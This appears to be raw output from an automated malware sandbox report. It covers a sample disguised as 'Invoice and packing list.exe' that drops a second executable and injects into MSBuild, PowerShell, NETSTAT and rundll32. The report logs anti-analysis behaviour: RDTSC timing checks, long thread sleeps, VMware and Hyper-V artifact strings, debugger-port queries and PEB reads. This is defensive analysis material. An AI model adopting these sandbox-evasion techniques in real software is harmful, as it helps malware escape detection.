Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 2F59904 second address: 2F5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 2F59B6E second address: 2F59B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 26D9904 second address: 26D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 26D9B6E second address: 26D9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory allocated: DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory allocated: 2B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory allocated: 4B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory allocated: 9720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory allocated: A720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory allocated: A950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory allocated: B950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Memory allocated: 1300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Memory allocated: 3080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Memory allocated: 15F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Memory allocated: 9780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Memory allocated: A780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Memory allocated: A9A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Memory allocated: B9A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 9_2_018AE0D0 rdtsc

9_2_018AE0D0

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6908	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8155	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1284	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5556	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4048	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 861	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Window / User API: threadDelayed 6303
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Window / User API: threadDelayed 3669

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 1.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 1.8 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE	API coverage: 2.1 %

Source: C:\Users\user\Desktop\Invoice and packing list.exe TID: 4268	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5548	Thread sleep count: 6908 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2624	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6484	Thread sleep count: 251 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5504	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4984	Thread sleep count: 5556 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4984	Thread sleep time: -11112000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4984	Thread sleep count: 4048 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4984	Thread sleep time: -8096000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe TID: 5988	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4424	Thread sleep count: 6303 > 30
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4424	Thread sleep time: -12606000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4424	Thread sleep count: 3669 > 30
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4424	Thread sleep time: -7338000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 0000000A.00000002.4485377091.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 0000000A.00000002.4492874400.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 0000000A.00000003.3097484766.0000000009C21000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 0000000A.00000000.2056890977.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: utlAHqvw.exe, 0000000B.00000002.2096436125.0000000001433000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000002.4483686089.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000A.00000000.2038920370.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 0000000A.00000002.4483686089.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 0000000A.00000002.4485377091.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 0000000A.00000002.4492874400.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000002.4483686089.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 0000000A.00000002.4483686089.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 0000000A.00000003.3097484766.0000000009C21000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: utlAHqvw.exe, 0000000B.00000002.2105850119.0000000007B92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d
Source: explorer.exe, 0000000A.00000000.2038920370.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000A.00000000.2056890977.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000002.4485377091.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\Invoice and packing list.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 9_2_018AE0D0 rdtsc

9_2_018AE0D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 9_2_018F2BF0 LdrInitializeThunk,

9_2_018F2BF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F0185 mov eax, dword ptr fs:[00000030h]	9_2_018F0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193019F mov eax, dword ptr fs:[00000030h]	9_2_0193019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193019F mov eax, dword ptr fs:[00000030h]	9_2_0193019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193019F mov eax, dword ptr fs:[00000030h]	9_2_0193019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193019F mov eax, dword ptr fs:[00000030h]	9_2_0193019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AA197 mov eax, dword ptr fs:[00000030h]	9_2_018AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AA197 mov eax, dword ptr fs:[00000030h]	9_2_018AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AA197 mov eax, dword ptr fs:[00000030h]	9_2_018AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0192E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0192E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E1D0 mov ecx, dword ptr fs:[00000030h]	9_2_0192E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0192E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0192E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0190E1D8 mov eax, dword ptr fs:[00000030h]	9_2_0190E1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019201DA mov eax, dword ptr fs:[00000030h]	9_2_019201DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019201DA mov eax, dword ptr fs:[00000030h]	9_2_019201DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C61D1 mov eax, dword ptr fs:[00000030h]	9_2_018C61D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C61D1 mov eax, dword ptr fs:[00000030h]	9_2_018C61D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E01F8 mov eax, dword ptr fs:[00000030h]	9_2_018E01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E0124 mov eax, dword ptr fs:[00000030h]	9_2_018E0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2140 mov ecx, dword ptr fs:[00000030h]	9_2_018B2140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2140 mov eax, dword ptr fs:[00000030h]	9_2_018B2140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AC156 mov eax, dword ptr fs:[00000030h]	9_2_018AC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6154 mov eax, dword ptr fs:[00000030h]	9_2_018B6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6154 mov eax, dword ptr fs:[00000030h]	9_2_018B6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F2160 mov eax, dword ptr fs:[00000030h]	9_2_018F2160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B208A mov eax, dword ptr fs:[00000030h]	9_2_018B208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A80A0 mov eax, dword ptr fs:[00000030h]	9_2_018A80A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019320DE mov eax, dword ptr fs:[00000030h]	9_2_019320DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B80E9 mov eax, dword ptr fs:[00000030h]	9_2_018B80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AA0E3 mov ecx, dword ptr fs:[00000030h]	9_2_018AA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019360E0 mov eax, dword ptr fs:[00000030h]	9_2_019360E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AC0F0 mov eax, dword ptr fs:[00000030h]	9_2_018AC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F20F0 mov ecx, dword ptr fs:[00000030h]	9_2_018F20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01934000 mov ecx, dword ptr fs:[00000030h]	9_2_01934000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CE016 mov eax, dword ptr fs:[00000030h]	9_2_018CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CE016 mov eax, dword ptr fs:[00000030h]	9_2_018CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CE016 mov eax, dword ptr fs:[00000030h]	9_2_018CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CE016 mov eax, dword ptr fs:[00000030h]	9_2_018CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AC020 mov eax, dword ptr fs:[00000030h]	9_2_018AC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AA020 mov eax, dword ptr fs:[00000030h]	9_2_018AA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01936050 mov eax, dword ptr fs:[00000030h]	9_2_01936050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01912045 mov eax, dword ptr fs:[00000030h]	9_2_01912045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2050 mov eax, dword ptr fs:[00000030h]	9_2_018B2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA060 mov eax, dword ptr fs:[00000030h]	9_2_018EA060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DC073 mov eax, dword ptr fs:[00000030h]	9_2_018DC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AE388 mov eax, dword ptr fs:[00000030h]	9_2_018AE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AE388 mov eax, dword ptr fs:[00000030h]	9_2_018AE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AE388 mov eax, dword ptr fs:[00000030h]	9_2_018AE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D438F mov eax, dword ptr fs:[00000030h]	9_2_018D438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D438F mov eax, dword ptr fs:[00000030h]	9_2_018D438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8397 mov eax, dword ptr fs:[00000030h]	9_2_018A8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8397 mov eax, dword ptr fs:[00000030h]	9_2_018A8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8397 mov eax, dword ptr fs:[00000030h]	9_2_018A8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B83C0 mov eax, dword ptr fs:[00000030h]	9_2_018B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B83C0 mov eax, dword ptr fs:[00000030h]	9_2_018B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B83C0 mov eax, dword ptr fs:[00000030h]	9_2_018B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B83C0 mov eax, dword ptr fs:[00000030h]	9_2_018B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019363C0 mov eax, dword ptr fs:[00000030h]	9_2_019363C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C03E9 mov eax, dword ptr fs:[00000030h]	9_2_018C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C03E9 mov eax, dword ptr fs:[00000030h]	9_2_018C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C03E9 mov eax, dword ptr fs:[00000030h]	9_2_018C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C03E9 mov eax, dword ptr fs:[00000030h]	9_2_018C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C03E9 mov eax, dword ptr fs:[00000030h]	9_2_018C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C03E9 mov eax, dword ptr fs:[00000030h]	9_2_018C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C03E9 mov eax, dword ptr fs:[00000030h]	9_2_018C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C03E9 mov eax, dword ptr fs:[00000030h]	9_2_018C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E63FF mov eax, dword ptr fs:[00000030h]	9_2_018E63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CE3F0 mov eax, dword ptr fs:[00000030h]	9_2_018CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CE3F0 mov eax, dword ptr fs:[00000030h]	9_2_018CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CE3F0 mov eax, dword ptr fs:[00000030h]	9_2_018CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA30B mov eax, dword ptr fs:[00000030h]	9_2_018EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA30B mov eax, dword ptr fs:[00000030h]	9_2_018EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA30B mov eax, dword ptr fs:[00000030h]	9_2_018EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AC301 mov ecx, dword ptr fs:[00000030h]	9_2_018AC301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D0310 mov ecx, dword ptr fs:[00000030h]	9_2_018D0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2324 mov eax, dword ptr fs:[00000030h]	9_2_018B2324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192035C mov eax, dword ptr fs:[00000030h]	9_2_0192035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192035C mov eax, dword ptr fs:[00000030h]	9_2_0192035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192035C mov eax, dword ptr fs:[00000030h]	9_2_0192035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192035C mov eax, dword ptr fs:[00000030h]	9_2_0192035C
